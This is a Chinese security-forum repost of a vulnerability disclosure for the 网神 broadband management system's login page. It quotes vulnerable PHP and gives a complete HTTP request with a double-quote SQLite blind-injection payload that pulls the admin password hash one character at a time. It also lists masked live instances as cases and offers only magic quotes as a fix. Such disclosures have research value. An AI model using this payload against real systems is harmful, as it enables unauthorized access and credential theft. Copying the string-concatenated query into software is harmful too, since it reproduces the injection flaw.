HanDs
管理员

[7月漏洞公开] 网神宽带管理系统(SQLite注入) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

RT, 先前大牛审计过的的:http://www.wooyun.org/bugs/wooyun-2015-0165284

详细说明:

大牛审计过的的:http://**.**.**.**/bugs/wooyun-2015-0165284



下了网神的 网神宽带管理系统 源码,审计一下!基本没什么洞!授权做的都可以!!意外发现登录处!!!



既然用的是" 双引号闭合的!!!代码:

在文件 /login.php

code 区域
if ($_REQUEST['action'] == 'login') {
$userName = iconv("UTF-8", "gbk", $_POST['userName']);
$password = iconv("UTF-8", "gbk", $_POST['password']);

if (!$userName || !$password) {
echo '{success:false,msg:"用户名或密码不能为空。"}';
return;
}

$DB = new SQLite('/usr/hls/etc/passwd.db');
$result = $DB->Query('select * from passwd where username="'.$userName.'"');

foreach($result as $r) {
if (!ip_allow($userName, $remote_addr)) {
echo '{success:false,msg:"该用户不允许从此IP登录。"}';
return;
}

if (!failure_allow($userName)) {
echo '{success:false,msg:"该用户由于连续错误登录次数过多被锁定,请稍后再试。"}';
return;
}

if ($r['password'] == md5($password) || $r['password'] == $password) {
failure_clear($userName);
} else {
failure_record($userName, $remote_addr);
echo '{success:false,msg:"密码错误,请重新输入。"}';
return;
}







这两句:

code 区域
$DB = new SQLite('/usr/hls/etc/passwd.db');
$result = $DB->Query('select * from passwd where username="'.$userName.'"');





SQLite数据库!!!! 双引号闭合,所以这里是双引号注入!!!!



得手工,sqlmap是跑不出来的!!(不然还能有,早被提交了!)



直接爆了:

code 区域
POST /login.php?action=login HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 82
Origin: https://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: https://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=7d8h8ht0dvicelotlhfu7emtv4

userName=1" or substr((select password from passwd),1,1)<1 or "1"="2&password=1111





上面语句是的得到管理密码的 第一位!!!



证明:

第一位截图:

QQ截图20160412170319.jpg





第二位:

QQ截图20160412170410.jpg





案例:

code 区域
https://**.**.**.**/
**.**.**.**:8090/
**.**.**.**:4443/
**.**.**.**/
**.**.**.**:1234/

漏洞证明:

如上!

修复方案:

开启gpc


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
宽带 管理系统 ( S QL it e 注入 )
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复